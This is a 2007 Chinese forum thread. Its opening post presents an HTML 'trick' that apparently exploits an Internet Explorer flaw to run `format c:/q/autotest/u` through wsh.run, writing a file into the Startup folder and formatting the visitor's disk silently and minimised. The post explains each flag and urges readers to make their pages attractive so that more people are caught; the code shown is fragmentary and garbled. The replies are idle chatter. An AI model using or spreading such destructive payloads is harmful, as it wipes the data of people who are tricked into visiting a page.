职业IT人-IT人生活圈

 找回密码
 成为会员
搜索
查看: 1352|回复: 3

有关HTML代码的另类应用技巧

[复制链接]
金融小美女 发表于 2007-8-15 10:01 | 显示全部楼层 |阅读模式
  这个是一个关于HTML代码攻击的,虽然短点大家看看怎么样,能实现的哦。
  现在的Windows操作系统实在是很方便,连格式化都是只用鼠标点点就可以了,不用象以前那样要输入命令来完成格盘。
  我们要做一个格本地磁盘网页并不是很难,会HTML代码的朋友一定是没有什么问题的,这个其实就是利用一下IE的漏洞来实现我们的目的。
  下面我们看一下下面的代码我们就会发现其中的奥妙所在了。
  scr.reset() scr.path=\"c:\\\\windows\\\\start menu\\\\programs\\\\启动\\\\文件名 scr.doc=\"\" wsh.run('start.exe /m format c:/q/autotest/u')
  对于HTML代码了解的朋友们一定看出来了吧,这段代码的利害之处就在于最后一句,格你的磁盘没商量。
  下面我们来看看这段代码的,具体的分析一下的他的工作原理是怎么样的。
  首先,我们来看看这一句
  scr.path=\"c:\\\\windows\\\\start menu\\\\programs\\\\启动\\\\文件名
  这句,就是当看到这个网页的时候,它会写入到用户的机器的启动目录下,并以一个文件名的文件形式出现
  wsh.run('start.exe /m format c:/q/autotest/u')
  这句就是我们这里所要讲的核心东西了,对于format 这个命令大家不会陌生的吧,只要知道这个命令的朋友,一定会知道这句命令的意思的,我就在这里不在多说什么了。
  在这里我把他的一些参数,简要的说说,大家会更加明白的。
  在进行格盘的时候系统会与你进行对话,是否进行的,大家看到这个参数了吗/autotest他会强制性的对你的硬盘进行格式化,而不再进行询问;/q/u这两个参数为系统不需要检查立执行。在上一句中的start.exe与/m选项配合,哈哈,相信在执行时以最小化的状态进行,谁都会头痛的。

  在这段代码里,核心语句
  wsh.run('start.exe /m format c:/q/autotest/u')
  我们只要对这段代码进行改动相信会出现更多不同的变化。在应用的时候把自己HTML代码做的漂亮一些,相信一定会有很多的人会上当,不小心中了你的圈套。
江南枫 发表于 2011-7-19 10:40 | 显示全部楼层
不早了 各位晚安~~~~
走就走吧 发表于 2011-7-20 09:51 | 显示全部楼层
你还想说什么啊....
秋秋 发表于 2011-9-15 10:15 | 显示全部楼层
第一次见得那么COOL
您需要登录后才可以回帖 登录 | 成为会员

本版积分规则

QQ|手机版|小黑屋|网站帮助|职业IT人-IT人生活圈 ( 粤ICP备12053935号-1 )|网站地图
本站文章版权归原发布者及原出处所有。内容为作者个人观点,并不代表本站赞同其观点和对其真实性负责,本站只提供参考并不构成任何投资及应用建议。本站是信息平台,网站上部分文章为转载,并不用于任何商业目的,我们已经尽可能的对作者和来源进行了通告,但是能力有限或疏忽造成漏登,请及时联系我们,我们将根据著作权人的要求立即更正或者删除有关内容。

GMT+8, 2024-4-25 18:27 , Processed in 0.120109 second(s), 20 queries , Gzip On.

Powered by Discuz! X3.4

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表